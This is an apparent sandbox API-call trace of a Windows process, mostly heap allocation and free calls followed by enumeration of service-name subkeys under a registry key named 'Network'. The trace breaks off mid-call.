[0175.250] GetProcessHeap () returned 0x4a0000 [0175.250] GetProcessHeap () returned 0x4a0000 [0175.250] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6378) returned 1 [0175.250] GetProcessHeap () returned 0x4a0000 [0175.250] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6378) returned 0x4e [0175.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6378 | out: hHeap=0x4a0000) returned 1 [0175.250] GetProcessHeap () returned 0x4a0000 [0175.250] GetProcessHeap () returned 0x4a0000 [0175.250] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a48) returned 1 [0175.250] GetProcessHeap () returned 0x4a0000 [0175.255] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a48) returned 0x14 [0175.255] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a48 | out: hHeap=0x4a0000) returned 1 [0175.255] GetProcessHeap () returned 0x4a0000 [0175.255] GetProcessHeap () returned 0x4a0000 [0175.255] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b63d0) returned 1 [0175.256] GetProcessHeap () returned 0x4a0000 [0175.256] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b63d0) returned 0x4e [0175.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b63d0 | out: hHeap=0x4a0000) returned 1 [0175.256] GetProcessHeap () returned 0x4a0000 [0175.256] GetProcessHeap () returned 0x4a0000 [0175.256] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a68) returned 1 [0175.256] GetProcessHeap () returned 0x4a0000 [0175.256] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a68) returned 0x14 [0175.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a68 | out: hHeap=0x4a0000) returned 1 [0175.256] GetProcessHeap () returned 0x4a0000 [0175.256] GetProcessHeap () returned 0x4a0000 [0175.257] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6428) returned 1 [0175.257] GetProcessHeap () returned 0x4a0000 [0175.257] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6428) returned 0x4e [0175.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6428 | out: hHeap=0x4a0000) returned 1 [0175.257] GetProcessHeap () returned 0x4a0000 [0175.257] GetProcessHeap () returned 0x4a0000 [0175.257] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a88) returned 1 [0175.257] GetProcessHeap () returned 0x4a0000 [0175.257] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a88) returned 0x14 [0175.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a88 | out: hHeap=0x4a0000) returned 1 [0175.257] GetProcessHeap () returned 0x4a0000 [0175.257] GetProcessHeap () returned 0x4a0000 [0175.258] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6480) returned 1 [0175.258] GetProcessHeap () returned 0x4a0000 [0175.258] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6480) returned 0x4e [0175.258] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6480 | out: hHeap=0x4a0000) returned 1 [0175.258] GetProcessHeap () returned 0x4a0000 [0175.258] GetProcessHeap () returned 0x4a0000 [0175.258] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5aa8) returned 1 [0175.258] GetProcessHeap () returned 0x4a0000 [0175.258] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5aa8) returned 0x14 [0175.258] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5aa8 | out: hHeap=0x4a0000) returned 1 [0175.258] GetProcessHeap () returned 0x4a0000 [0175.258] GetProcessHeap () returned 0x4a0000 [0175.259] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b64d8) returned 1 [0175.259] GetProcessHeap () returned 0x4a0000 [0175.259] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b64d8) returned 0x4e [0175.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b64d8 | out: hHeap=0x4a0000) returned 1 [0175.259] GetProcessHeap () returned 0x4a0000 [0175.259] GetProcessHeap () returned 0x4a0000 [0175.259] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ac8) returned 1 [0175.259] GetProcessHeap () returned 0x4a0000 [0175.259] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ac8) returned 0x14 [0175.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ac8 | out: hHeap=0x4a0000) returned 1 [0175.259] GetProcessHeap () returned 0x4a0000 [0175.259] GetProcessHeap () returned 0x4a0000 [0175.260] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6530) returned 1 [0175.260] GetProcessHeap () returned 0x4a0000 [0175.260] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6530) returned 0x4e [0175.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6530 | out: hHeap=0x4a0000) returned 1 [0175.260] GetProcessHeap () returned 0x4a0000 [0175.260] GetProcessHeap () returned 0x4a0000 [0175.260] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ae8) returned 1 [0175.260] GetProcessHeap () returned 0x4a0000 [0175.260] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ae8) returned 0x14 [0175.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ae8 | out: hHeap=0x4a0000) returned 1 [0175.260] GetProcessHeap () returned 0x4a0000 [0175.260] GetProcessHeap () returned 0x4a0000 [0175.260] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6588) returned 1 [0175.261] GetProcessHeap () returned 0x4a0000 [0175.261] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6588) returned 0x4e [0175.261] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6588 | out: hHeap=0x4a0000) returned 1 [0175.261] GetProcessHeap () returned 0x4a0000 [0175.261] GetProcessHeap () returned 0x4a0000 [0175.261] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b08) returned 1 [0175.261] GetProcessHeap () returned 0x4a0000 [0175.261] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5b08) returned 0x14 [0175.261] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b08 | out: hHeap=0x4a0000) returned 1 [0175.261] GetProcessHeap () returned 0x4a0000 [0175.261] GetProcessHeap () returned 0x4a0000 [0175.262] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b65e0) returned 1 [0175.262] GetProcessHeap () returned 0x4a0000 [0175.262] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b65e0) returned 0x4e [0175.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b65e0 | out: hHeap=0x4a0000) returned 1 [0175.262] GetProcessHeap () returned 0x4a0000 [0175.262] GetProcessHeap () returned 0x4a0000 [0175.262] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b28) returned 1 [0175.262] GetProcessHeap () returned 0x4a0000 [0175.262] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5b28) returned 0x14 [0175.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x4a0000) returned 1 [0175.262] GetProcessHeap () returned 0x4a0000 [0175.262] GetProcessHeap () returned 0x4a0000 [0175.262] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6638) returned 1 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.263] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6638) returned 0x4e [0175.263] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6638 | out: hHeap=0x4a0000) returned 1 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.263] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66a8) returned 1 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.263] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b66a8) returned 0x14 [0175.263] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66a8 | out: hHeap=0x4a0000) returned 1 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.263] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e90) returned 1 [0175.263] GetProcessHeap () returned 0x4a0000 [0175.264] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6e90) returned 0x4e [0175.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e90 | out: hHeap=0x4a0000) returned 1 [0175.264] GetProcessHeap () returned 0x4a0000 [0175.264] GetProcessHeap () returned 0x4a0000 [0175.264] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66c8) returned 1 [0175.264] GetProcessHeap () returned 0x4a0000 [0175.264] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b66c8) returned 0x14 [0175.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66c8 | out: hHeap=0x4a0000) returned 1 [0175.264] GetProcessHeap () returned 0x4a0000 [0175.264] GetProcessHeap () returned 0x4a0000 [0175.265] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ee8) returned 1 [0175.265] GetProcessHeap () returned 0x4a0000 [0175.265] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6ee8) returned 0x4e [0175.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ee8 | out: hHeap=0x4a0000) returned 1 [0175.265] GetProcessHeap () returned 0x4a0000 [0175.265] GetProcessHeap () returned 0x4a0000 [0175.265] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66e8) returned 1 [0175.265] GetProcessHeap () returned 0x4a0000 [0175.265] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b66e8) returned 0x14 [0175.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66e8 | out: hHeap=0x4a0000) returned 1 [0175.265] GetProcessHeap () returned 0x4a0000 [0175.265] GetProcessHeap () returned 0x4a0000 [0175.266] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f40) returned 1 [0175.266] GetProcessHeap () returned 0x4a0000 [0175.266] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6f40) returned 0x4e [0175.266] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f40 | out: hHeap=0x4a0000) returned 1 [0175.271] GetProcessHeap () returned 0x4a0000 [0175.271] GetProcessHeap () returned 0x4a0000 [0175.271] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6708) returned 1 [0175.271] GetProcessHeap () returned 0x4a0000 [0175.271] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6708) returned 0x14 [0175.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6708 | out: hHeap=0x4a0000) returned 1 [0175.272] GetProcessHeap () returned 0x4a0000 [0175.272] GetProcessHeap () returned 0x4a0000 [0175.272] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f98) returned 1 [0175.272] GetProcessHeap () returned 0x4a0000 [0175.272] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6f98) returned 0x4e [0175.272] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f98 | out: hHeap=0x4a0000) returned 1 [0175.272] GetProcessHeap () returned 0x4a0000 [0175.272] GetProcessHeap () returned 0x4a0000 [0175.272] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6728) returned 1 [0175.272] GetProcessHeap () returned 0x4a0000 [0175.272] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6728) returned 0x14 [0175.273] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6728 | out: hHeap=0x4a0000) returned 1 [0175.273] GetProcessHeap () returned 0x4a0000 [0175.273] GetProcessHeap () returned 0x4a0000 [0175.273] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ff0) returned 1 [0175.273] GetProcessHeap () returned 0x4a0000 [0175.273] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6ff0) returned 0x4e [0175.273] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ff0 | out: hHeap=0x4a0000) returned 1 [0175.273] GetProcessHeap () returned 0x4a0000 [0175.273] GetProcessHeap () returned 0x4a0000 [0175.273] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6748) returned 1 [0175.273] GetProcessHeap () returned 0x4a0000 [0175.273] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6748) returned 0x14 [0175.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6748 | out: hHeap=0x4a0000) returned 1 [0175.274] GetProcessHeap () returned 0x4a0000 [0175.274] GetProcessHeap () returned 0x4a0000 [0175.274] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7048) returned 1 [0175.274] GetProcessHeap () returned 0x4a0000 [0175.274] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b7048) returned 0x4e [0175.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7048 | out: hHeap=0x4a0000) returned 1 [0175.274] GetProcessHeap () returned 0x4a0000 [0175.274] GetProcessHeap () returned 0x4a0000 [0175.274] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6768) returned 1 [0175.274] GetProcessHeap () returned 0x4a0000 [0175.274] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6768) returned 0x14 [0175.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6768 | out: hHeap=0x4a0000) returned 1 [0175.275] GetProcessHeap () returned 0x4a0000 [0175.275] GetProcessHeap () returned 0x4a0000 [0175.275] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b70b8) returned 1 [0175.275] GetProcessHeap () returned 0x4a0000 [0175.275] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b70b8) returned 0x4e [0175.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b70b8 | out: hHeap=0x4a0000) returned 1 [0175.275] GetProcessHeap () returned 0x4a0000 [0175.275] GetProcessHeap () returned 0x4a0000 [0175.275] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6788) returned 1 [0175.275] GetProcessHeap () returned 0x4a0000 [0175.275] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6788) returned 0x14 [0175.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6788 | out: hHeap=0x4a0000) returned 1 [0175.276] GetProcessHeap () returned 0x4a0000 [0175.276] GetProcessHeap () returned 0x4a0000 [0175.276] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5de0) returned 1 [0175.276] GetProcessHeap () returned 0x4a0000 [0175.276] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5de0) returned 0x10 [0175.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5de0 | out: hHeap=0x4a0000) returned 1 [0175.276] RegCloseKey (hKey=0x78) returned 0x0 [0175.276] RegOpenKeyExW (in: hKey=0x74, lpSubKey="Network", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd9c | out: phkResult=0x2bfd9c*=0x78) returned 0x0 [0175.277] RegQueryInfoKeyW (in: hKey=0x78, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2bfd84, lpcbMaxSubKeyLen=0x2bfd98, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2bfd84*=0x6c, lpcbMaxSubKeyLen=0x2bfd98, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.277] GetProcessHeap () returned 0x4a0000 [0175.277] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5de0 [0175.277] GetProcessHeap () returned 0x4a0000 [0175.277] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x9e) returned 0x4b6e90 [0175.277] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x0, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AFD", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.277] lstrlenW (lpString="AFD") returned 3 [0175.277] GetProcessHeap () returned 0x4a0000 [0175.277] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b3ab8 [0175.278] GetProcessHeap () returned 0x4a0000 [0175.278] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5b28 [0175.278] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppInfo", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.278] lstrlenW (lpString="AppInfo") returned 7 [0175.278] GetProcessHeap () returned 0x4a0000 [0175.278] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5df8 [0175.278] GetProcessHeap () returned 0x4a0000 [0175.278] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5b08 [0175.278] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppMgmt", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.278] lstrlenW (lpString="AppMgmt") returned 7 [0175.278] GetProcessHeap () returned 0x4a0000 [0175.278] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5e10 [0175.279] GetProcessHeap () returned 0x4a0000 [0175.279] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5ae8 [0175.279] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Base", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.279] lstrlenW (lpString="Base") returned 4 [0175.279] GetProcessHeap () returned 0x4a0000 [0175.279] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5e28 [0175.279] GetProcessHeap () returned 0x4a0000 [0175.279] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5ac8 [0175.279] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="BFE", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.279] lstrlenW (lpString="BFE") returned 3 [0175.279] GetProcessHeap () returned 0x4a0000 [0175.280] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b5238 [0175.280] GetProcessHeap () returned 0x4a0000 [0175.280] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5aa8 [0175.280] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot Bus Extender", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.280] lstrlenW (lpString="Boot Bus Extender") returned 17 [0175.280] GetProcessHeap () returned 0x4a0000 [0175.280] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x24) returned 0x4b50a8 [0175.280] GetProcessHeap () returned 0x4a0000 [0175.280] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a88 [0175.280] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot file system", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.280] lstrlenW (lpString="Boot file system") returned 16 [0175.280] GetProcessHeap () returned 0x4a0000 [0175.281] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x22) returned 0x4b50d8 [0175.281] GetProcessHeap () returned 0x4a0000 [0175.281] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a68 [0175.281] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x7, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bowser", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.281] lstrlenW (lpString="bowser") returned 6 [0175.281] GetProcessHeap () returned 0x4a0000 [0175.281] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5e40 [0175.281] GetProcessHeap () returned 0x4a0000 [0175.281] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a48 [0175.281] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x8, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Browser", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.281] lstrlenW (lpString="Browser") returned 7 [0175.281] GetProcessHeap () returned 0x4a0000 [0175.505] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5e58 [0175.505] GetProcessHeap () returned 0x4a0000 [0175.505] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a28 [0175.505] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x9, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CryptSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.505] lstrlenW (lpString="CryptSvc") returned 8 [0175.505] GetProcessHeap () returned 0x4a0000 [0175.505] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5a08 [0175.505] GetProcessHeap () returned 0x4a0000 [0175.505] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b59e8 [0175.506] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xa, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DcomLaunch", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.506] lstrlenW (lpString="DcomLaunch") returned 10 [0175.506] GetProcessHeap () returned 0x4a0000 [0175.506] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b59c8 [0175.506] GetProcessHeap () returned 0x4a0000 [0175.506] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b59a8 [0175.506] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xb, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="dfsc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.506] lstrlenW (lpString="dfsc") returned 4 [0175.506] GetProcessHeap () returned 0x4a0000 [0175.506] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5e70 [0175.506] GetProcessHeap () returned 0x4a0000 [0175.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5988 [0175.507] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xc, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Dhcp", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.507] lstrlenW (lpString="Dhcp") returned 4 [0175.507] GetProcessHeap () returned 0x4a0000 [0175.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5e88 [0175.507] GetProcessHeap () returned 0x4a0000 [0175.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5968 [0175.507] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xd, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DnsCache", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.507] lstrlenW (lpString="DnsCache") returned 8 [0175.507] GetProcessHeap () returned 0x4a0000 [0175.507] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5948 [0175.507] GetProcessHeap () returned 0x4a0000 [0175.508] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5928 [0175.508] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xe, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Dot3Svc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.508] lstrlenW (lpString="Dot3Svc") returned 7 [0175.508] GetProcessHeap () returned 0x4a0000 [0175.508] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5ea0 [0175.508] GetProcessHeap () returned 0x4a0000 [0175.508] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5908 [0175.508] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xf, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Eaphost", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.508] lstrlenW (lpString="Eaphost") returned 7 [0175.508] GetProcessHeap () returned 0x4a0000 [0175.508] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5eb8 [0175.508] GetProcessHeap () returned 0x4a0000 [0175.509] 